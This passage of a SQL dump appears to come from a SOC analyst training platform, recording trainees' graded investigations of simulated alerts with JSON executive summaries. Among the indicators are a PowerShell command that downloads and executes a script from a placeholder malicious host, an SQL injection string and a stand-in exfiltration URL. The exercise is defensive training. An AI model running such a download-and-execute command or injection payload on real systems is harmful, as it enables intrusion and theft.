(+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-03 08:44:54', '2026-03-03 08:46:47', 0, NULL),
(375, 233, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 09:48:25', '2026-03-03 09:48:25', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(376, 233, 1386, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.1.1.1\",\"ip-10.1.1.10\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 1:13:19 PM\\nALERT: False Positive: Routine Internal Network Scan\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 10.1.1.1\\n- [IP] 10.1.1.10\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T12:13:40.895Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-03 15:15:41', '2026-03-03 12:10:41', '2026-03-03 12:13:40', 0, NULL),
(377, 233, 847, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.45\",\"ip-192.168.1.150\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 1:15:19 PM\\nALERT: SQL Injection Attempt Blocked\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 198.51.100.45\\n- [IP] 192.168.1.150\\n- [PAYLOAD] \' OR \'1\'=\'1\' --\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T12:15:21.924Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-03 15:20:57', '2026-03-03 12:13:57', '2026-03-03 12:15:21', 0, NULL),
(378, 56, 1361, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 15:51:36', '2026-03-03 15:51:36', 0, NULL),
(379, 56, 1392, 'investigating', NULL, NULL, NULL, NULL, '2026-03-03 19:02:37', '2026-03-03 15:52:37', '2026-03-03 15:52:37', 0, NULL),
(380, 234, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 19:44:00', '2026-03-03 19:44:00', 0, NULL),
(381, 234, 1433, 'investigating', NULL, NULL, NULL, NULL, '2026-03-03 22:51:21', '2026-03-03 19:44:21', '2026-03-03 19:44:21', 0, NULL),
(382, 235, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 20:13:02', '2026-03-03 20:13:02', 0, NULL),
(383, 235, 1378, 'investigating', NULL, NULL, NULL, NULL, '2026-03-03 23:20:28', '2026-03-03 20:14:28', '2026-03-03 20:14:28', 0, NULL),
(384, 237, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 23:25:53', '2026-03-03 23:25:53', 0, NULL),
(385, 189, 305, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-203.0.113.45\",\"hash-e3b0c442\",\"cmd-1\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:49:48 AM\\nALERT: Suspicious PowerShell Execution [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 203.0.113.45\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [COMMAND] powershell -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicioussite.com/payload\')\\\"\\n- [FILENAME] malicious_script.ps1\\n- [USERNAME] john.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-03-04T01:50:03.419Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-04 01:46:47', '2026-03-04 01:50:03', 0, NULL),
(386, 189, 306, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-5d41402a\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:51:13 AM\\nALERT: Persistence Mechanism Established [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [USERNAME] john.doe\\n- [FILENAME] taskhost.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-04T01:51:27.139Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-04 01:50:03', '2026-03-04 01:51:27', 0, NULL),
(387, 189, 307, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-192.168.1.20\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:52:56 AM\\nALERT: Unauthorized Lateral Movement Detected [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 192.168.1.20\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadoou MANE\",\"submitted_at\":\"2026-03-04T01:53:15.347Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-04 01:51:27', '2026-03-04 01:53:15', 0, NULL),
(388, 189, 308, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.1.2.15\",\"ip-203.0.113.45\",\"hash-f2ca1bb6\",\"domain-https://mali\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:54:38 AM\\nALERT: Data Exfiltration Attempt [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 10.1.2.15\\n- [IP] 203.0.113.45\\n- [HASH] f2ca1bb6c7e907d06dafe4687e579fce\\n- [DOMAIN] https://malicious-c2.com/exfil\\n- [FILENAME] geo_data_export.zip\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-03-04T01:54:55.259Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-04 01:53:15', '2026-03-04 01:54:55', 0, NULL),
(389, 237, 693, 'investigating', NULL, NULL, NULL, NULL, '2026-03-04 19:07:30', '2026-03-04 15:58:30', '2026-03-04 15:58:30', 0, NULL),
(390, 237, 1435, 'investigating', NULL, NULL, NULL, NULL, '2026-03-04 19:13:10', '2026-03-04 16:07:10', '2026-03-04 16:07:10', 0, NULL),
(391, 241, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-04 16:22:18', '2026-03-04 16:22:18', 0, NULL),
(392, 244, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-04 20:19:53', '2026-03-04 20:19:53', 0, NULL),
(393, 245, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-05 04:55:30', '2026-03-05 04:55:30', 0, NULL),
(394, 225, 606, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.25\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:18:59 PM\\nALERT: Failed Login Attempts from Foreign IP\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 198.51.100.25\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:19:14.654Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-05 08:27:03', '2026-03-05 05:17:03', '2026-03-05 05:19:14', 0, NULL),
(395, 225, 1446, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-d41d8cd9\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:21:49 PM\\nALERT: Suspicious App Download Detected [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] CryptoTraderProSetup.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:21:53.666Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-05 08:30:20', '2026-03-05 05:20:20', '2026-03-05 05:21:53', 0, NULL),
(396, 225, 1447, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-143.110.227.12\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:23:20 PM\\nALERT: Execution of Unknown Scripts [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 143.110.227.12\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File hidden_script.ps1\\n- [FILENAME] hidden_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:23:22.318Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-05 05:21:53', '2026-03-05 05:23:22', 0, NULL),
(397, 225, 1448, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-5d41402a\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:24:40 PM\\nALERT: Establishment of Persistence Mechanism [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:24:43.195Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-05 05:23:22', '2026-03-05 05:24:43', 0, NULL),
(398, 225, 1449, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-6f5902ac\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:26:13 PM\\nALERT: Unauthorized Lateral Movement Attempt [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] 6f5902ac237024bdd0c176cb93063dc4\\n- [USERNAME] jdoe\\n- [FILENAME] mimikatz.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:26:15.724Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-05 05:24:43', '2026-03-05 05:26:15', 0, NULL),
(399, 225, 1450, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.101\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:27:13 PM\\nALERT: Sensitive Data Exfiltration Detected [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.0.101\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] wallet_keys.txt\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:27:14.809Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-05 05:26:15', '2026-03-05 05:27:14', 0, NULL),
(400, 246, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-05 07:51:20', '2026-03-05 07:51:20', 0, NULL),
(401, 246, 1383, 'investigating', NULL, NULL, NULL, NULL, '2026-03-05 11:03:39', '2026-03-05 07:54:39', '2026-03-05 07:54:39', 0, NULL),
(402, 247, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-05 11:37:14', '2026-03-05 11:37:14', 0, NULL),
(403, 247, 1438, 'investigating', NULL, NULL, NULL, NULL, '2026-03-05 14:47:39', '2026-03-05 11:37:39', '2026-03-05 11:37:39', 0, NULL),
(404, 248, 268, 'graded', 78, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/13/2026, 4:31:41 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-13T13:32:23.474Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/4)\",\"missed_items\":[\"block_hash\",\"collect_forensics\",\"escalate\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-03-05 17:39:52', '2026-03-13 13:32:23', 0, NULL),
(405, 225, 854, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.5\",\"ip-192.168.100.100\",\"domain-https://mark\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:34:00 AM\\nALERT: False Positive: Legitimate QR Code Scanning Detected\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 10.0.0.5\\n- [IP] 192.168.100.100\\n- [DOMAIN] https://marketing.retailcorp.com/qrcampaign\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T22:34:12.678Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-06 01:42:53', '2026-03-05 22:32:53', '2026-03-05 22:34:12', 0, NULL),
(406, 250, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 02:52:55', '2026-03-06 02:52:55', 0, NULL),
(407, 251, 268, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_hash\",\"collect_forensics\",\"escalate\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 10:52:29 AM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-10T05:22:50.598Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-06 04:45:23', '2026-03-10 05:22:50', 0, NULL),
(408, 254, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 07:04:42', '2026-03-06 07:04:42', 0, NULL),
(409, 254, 1377, 'investigating', NULL, NULL, NULL, NULL, '2026-03-06 10:33:42', '2026-03-06 07:27:42', '2026-03-06 07:27:42', 0, NULL),
(410, 256, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-06 08:30:57', '2026-03-06 08:30:57', 0, NULL),
(411, 225, 1442, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.70\",\"ip-203.0.113.100\"],\"selectedActions\":[\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"isolate_host\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 8:59:58 PM\\nALERT: Successful Data Exfiltration to External Server\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 192.168.1.70\\n- [IP] 203.0.113.100\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:00:02.162Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-06 13:09:02', '2026-03-06 09:59:02', '2026-03-06 10:00:02', 0, NULL),
(412, 225, 849, 'graded', 90, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.50\",\"domain-http://offic\",\"artifact_3\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/6/2026, 9:15:25 PM\\nALERT: Credential Harvesting Attempt via Phishing Email\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.50\\n- [DOMAIN] http://office365-login.com/login\\n- [EMAIL] no-reply@office365-login.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-06T10:15:27.854Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-06 13:23:27', '2026-03-06 10:14:27', 